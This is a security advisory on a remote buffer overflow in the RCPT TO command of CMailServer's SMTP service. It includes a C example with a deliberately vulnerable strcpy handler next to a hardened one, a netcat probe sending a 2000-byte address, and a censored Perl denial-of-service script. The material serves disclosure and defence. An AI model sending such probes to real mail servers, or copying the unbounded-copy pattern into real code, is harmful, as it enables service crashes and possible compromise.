Youngzsoft CMailServer RCPT TO Remote Buffer Overflow Vulnerability

Published: 2003-05-10
Updated: 2003-05-15

Affected systems:
YoungZSoft CMailServer 4.0.2003.03.27
YoungZSoft CMailServer 4.0.2002.11.24
Unaffected systems:
YoungZSoft CMailServer 4.0.2003.03.30
Description:
BUGTRAQ  ID: 7548

CMailServer is an e-mail server that also ships a web-based mail interface.

The SMTP service in CMailServer does not perform proper bounds checking on the argument of the "RCPT TO" envelope command. A remote attacker who supplies an overlong recipient address (the published test uses a local part of about 2000 bytes) overruns the fixed-size buffer that holds the address and corrupts adjacent memory. In the simplest case this crashes the SMTP service; with a carefully constructed payload it may allow arbitrary code to be executed with the privileges of the service. Note that RCPT TO is an SMTP envelope command, not a message header: the overflow is triggered before any message body is transmitted, so no mail has to be accepted or stored for the attack to work.

<*Source: Dennis Rand (DER@cowi.dk)
  
  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105258772101349&w=2
*>
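To make the defect in the description concrete, here is an added C example. It is not CMailServer's code (the product is closed source) and not from the advisory's author: it models a hypothetical RCPT TO handler that copies the address into a fixed stack buffer without a length check, beside a hardened version that measures the argument first and enforces the RFC 5321 limit of 256 octets for a forward-path. It also builds the 2000-byte probe line from the netcat session in the test method. The host name warlab.dk comes from that session; the function names and the 256-byte buffer size are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

/* RFC 5321 section 4.5.3.1.3: a forward-path (the "<...>" after RCPT TO:)
 * is at most 256 octets including the angle brackets. */
#define MAX_PATH_LEN 256

/* Hypothetical vulnerable handler (illustrative, not CMailServer's real
 * code). It copies the argument of RCPT TO: into a fixed stack buffer with
 * no length check, so a 2000-byte address like the one in the advisory runs
 * off the end of rcpt[] and overwrites the saved registers, return address
 * and exception handler chain above it. */
int rcpt_to_vulnerable(const char *line)
{
    char rcpt[MAX_PATH_LEN];
    const char *arg = line + strlen("RCPT TO:");
    strcpy(rcpt, arg);          /* the bug: unbounded copy */
    return 250;                 /* "250 Recipient Ok" */
}

/* Hardened handler: verify the verb, measure the argument before touching
 * the destination, enforce the RFC limit and the caller's buffer size, and
 * reject anything else with a 5xx reply instead of copying it. */
int rcpt_to_hardened(const char *line, char *out, size_t outsz)
{
    static const char verb[] = "RCPT TO:";
    if (strncasecmp(line, verb, sizeof verb - 1) != 0)
        return 500;             /* not an RCPT command */
    const char *arg = line + (sizeof verb - 1);
    while (*arg == ' ')
        arg++;
    size_t len = strcspn(arg, "\r\n");      /* argument without CRLF */
    if (len < 2 || arg[0] != '<' || arg[len - 1] != '>')
        return 501;             /* malformed path */
    if (len > MAX_PATH_LEN || len >= outsz)
        return 501;             /* too long: refuse, never truncate-and-copy */
    memcpy(out, arg, len);
    out[len] = '\0';
    return 250;
}

/* Convenience wrapper that returns only the reply code. */
int smtp_rcpt_status(const char *line)
{
    char path[MAX_PATH_LEN + 1];
    return rcpt_to_hardened(line, path, sizeof path);
}

/* Build the advisory's probe line: "RCPT TO:<" + n x 'a' + "@warlab.dk>\r\n".
 * warlab.dk is the host name from the original netcat session. */
char *build_overlong_rcpt(size_t n)
{
    static const char head[] = "RCPT TO:<", tail[] = "@warlab.dk>\r\n";
    char *line = malloc(sizeof head - 1 + n + sizeof tail);
    if (line == NULL)
        return NULL;
    memcpy(line, head, sizeof head - 1);
    memset(line + sizeof head - 1, 'a', n);
    memcpy(line + sizeof head - 1 + n, tail, sizeof tail);   /* includes NUL */
    return line;
}

/* Reply code the hardened parser gives the probe for a local part of n bytes. */
int overlong_rcpt_status(size_t n)
{
    char *line = build_overlong_rcpt(n);
    if (line == NULL)
        return -1;
    int code = smtp_rcpt_status(line);
    free(line);
    return code;
}

int main(void)
{
    printf("normal RCPT TO       -> %d\n",
           smtp_rcpt_status("RCPT TO:<admin@warlab.dk>\r\n"));
    printf("2000-byte local part -> %d\n", overlong_rcpt_status(2000));
    /* rcpt_to_vulnerable() is deliberately not fed the 2000-byte line here:
     * on the real server that is the crash the advisory describes. */
    return 0;
}
```

The hardened version rejects a path of 257 octets or more with a 501 reply and accepts one of exactly 256, so a server written this way answers the probe from the test method with an error line instead of closing the connection. The vulnerable version is only ever called with a short, well-formed address in this example; its behaviour on the overlong line is undefined, which is precisely the point.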

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching purposes. Use at your own risk!

Dennis Rand (DER@cowi.dk) provided the following test method. The netcat session sends the overlong address in RCPT TO, as the description states; note that the Perl script that follows it places the buffer in MAIL FROM instead, and its buffer length is censored, so the script does not run as posted:

nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>

#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on the
# stack allowing a system compromise with code execution running as SYSTEM.
#
#
# I've censored some of the source code out. =)
#
# Solution:
# None at this time
#
#

use IO::Socket;
    
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; #


my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);

Recommendations:
Vendor patch:

YoungZSoft
----------
Upgrade to ESMTP CMailServer 4.0.2003.03.30 or later:

http://www.youngzsoft.com

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.